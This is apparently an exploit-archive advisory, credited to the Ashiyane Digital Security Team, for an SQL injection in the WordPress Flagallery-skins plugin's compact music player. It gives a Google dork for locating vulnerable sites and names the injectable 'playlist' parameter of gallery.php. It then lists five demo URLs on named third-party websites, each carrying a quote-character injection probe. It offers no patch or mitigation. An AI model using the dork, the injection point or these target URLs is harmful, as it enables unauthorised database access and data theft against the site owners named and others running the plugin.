Wordpress Flagallery-skins plugin suffers from an SQL Injection vulnerability. Note that this advisory has site-specific information.
8e7321e57a191458bb0488828e864521503137f0590d73239395524588a9079f
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
# http://www.unclebobsrockshop.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=songs%27
#
# http://headingtoawedding.ca/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=homepage%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############